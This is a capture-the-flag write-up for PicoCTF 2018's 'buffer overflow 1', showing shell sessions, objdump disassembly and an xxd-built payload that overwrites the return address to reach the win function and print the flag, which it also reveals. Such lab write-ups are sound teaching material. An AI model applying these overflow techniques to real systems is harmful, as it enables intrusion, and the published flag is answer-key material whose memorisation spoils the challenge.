Home PicoCTF 2018 Binary Exploitation 200: buffer overflow 1
Writeup
Cancel

Binary Exploitation 200: buffer overflow 1

Challenge
Okay now you’re cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba on the shell server. Source.

Solution
Using an entirely manual binary search we find out which bytes we actually control:

1
2
3
4
5
6
7
8
9
10
11
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab
Okay, time to return... Fingers Crossed... Jumping to 0x62616161
Segmentation fault
...
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
Okay, time to return... Fingers Crossed... Jumping to 0x61626364
Segmentation fault

Ok, good. Now we have control of the return, we just need to point it to wherever the flag is printed? I guess that’s the win function

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ objdump -x -d vuln
....

080485cb <win>:
 80485cb:       55                      push   %ebp
 80485cc:       89 e5                   mov    %esp,%ebp
 80485ce:       83 ec 58                sub    $0x58,%esp
 80485d1:       83 ec 08                sub    $0x8,%esp
 80485d4:       68 50 87 04 08          push   $0x8048750
 80485d9:       68 52 87 04 08          push   $0x8048752
 80485de:       e8 bd fe ff ff          call   80484a0 <fopen@plt>
 80485e3:       83 c4 10                add    $0x10,%esp
 80485e6:       89 45 f4                mov    %eax,-0xc(%ebp)
 80485e9:       83 7d f4 00             cmpl   $0x0,-0xc(%ebp)
 80485ed:       75 1a                   jne    8048609 <win+0x3e>
 80485ef:       83 ec 0c                sub    $0xc,%esp
...

So we want to return to 0x080485cb

First I experimented with some known characters in order to figure out the byte
mapping because little endian doesn’t work with xxd -r

1
2
3
4
5
6
7
$ echo -n 'ÏÖ' | xxd -e # Little endian
00000000: 96c38fc3                             ....
$ echo -n 'ÏÖ' | xxd    # Big endian
00000000: c38f c396                                ....
$ # 080485cb < our target string
$ echo '00000000: cb85 0408' | xxd -r
$ # And the mapping is a bunch of unprintable characters.

This needs to be prefixed with a known length of buffer so we’ll just construct something xxd is happy with:

1
2
3
00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408

And then run this on the server:

1
2
3
4
5
6
$ echo '00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408' | xxd -r | ./vuln
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy56a7b196}Segmentation fault

It works!!!

Flag

picoCTF{addr3ss3s_ar3_3asy56a7b196}Segmentation fault